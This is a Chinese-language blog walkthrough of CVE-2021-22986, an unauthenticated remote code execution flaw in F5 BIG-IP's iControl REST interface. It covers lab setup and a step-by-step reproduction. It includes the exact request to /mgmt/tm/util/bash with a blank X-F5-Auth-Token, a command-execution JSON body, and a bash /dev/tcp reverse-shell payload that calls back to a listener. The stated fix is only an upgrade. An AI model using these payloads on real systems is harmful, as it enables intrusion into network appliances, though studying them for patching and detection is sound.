F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

这期内容当中小编将会给大家带来有关F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x00简介

F5 BIG-IP 是美国“F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

0x01漏洞概述

F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。

0x02影响版本

F5 BIG-IP 16.0.0-16.0.1

F5 BIG-IP 15.1.0-15.1.2

F5 BIG-IP 14.1.0-14.1.3.1

F5 BIG-IP 13.1.0-13.1.3.5

F5 BIG-IP 12.1.0-12.1.5.2

F5 BIG-IQ 7.1.0-7.1.0.2

F5 BIG-IQ 7.0.0-7.0.0.1

F5 BIG-IQ 6.0.0-6.1.0

0x03环境搭建

1、 本次漏洞环境使用F5 16.0.0版本进行搭建,F5下载地址:

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.0

2、 注册一个F5账号,访问下载链接,选择相应版本进行下载并同意条款

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

3、选择VMware格式的下载文件,然后选择下载地区这里选择离得近得下载即可

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

4、下载完成后,使用VMwear导入安装

VMwear左上角‘文件’->‘打开‘选择下载好的文件

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

5、选择同意许可,选择安装位置

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

6、配置方面看自己的选择导入后启动即可系统默认账户:root/default登陆后需要修改默认密码

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

7、配置完成后打开虚拟机输入初始密码,会提示修改密码 //需要修改强密码

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

8、修改完成密码后输入config设置IP

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

9、在浏览器访问此地址需要使用https://your-ip

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

10、登陆账号为admin登陆密码为之前虚拟机设置得密码,登陆之后需要修改一次密码 需为强密码

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

0x04漏洞复现

1、首先访问以下url,然后使用Burp进行抓包并发送到Repeater(重放)模块

https://your-ip/mgmt/tm/util/bash

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

2、修改数据包GET为POST并在添加上X-F5-Auth-Token字段和Authorization

X-F5-Auth-Token字段值为空

Authorization: Basic YWRtaW46QVNhc1M= 后面使用basse64加密了解码出来为admin:ASasS

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

3、在包内添加以下代码执行命令,查看id,添加完成后发送包

{"command":"run","utilCmdArgs":"-c id"}

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

4、既然可以执行命令,来反弹shell,使用kali监听

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/172.16.1.127/7765 0>&1'"}

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

0x05修复方式

1、建议将F5 BIG-IP / BIG-IQ 升级至安全版本。

上述就是小编为大家分享的F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/220066.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论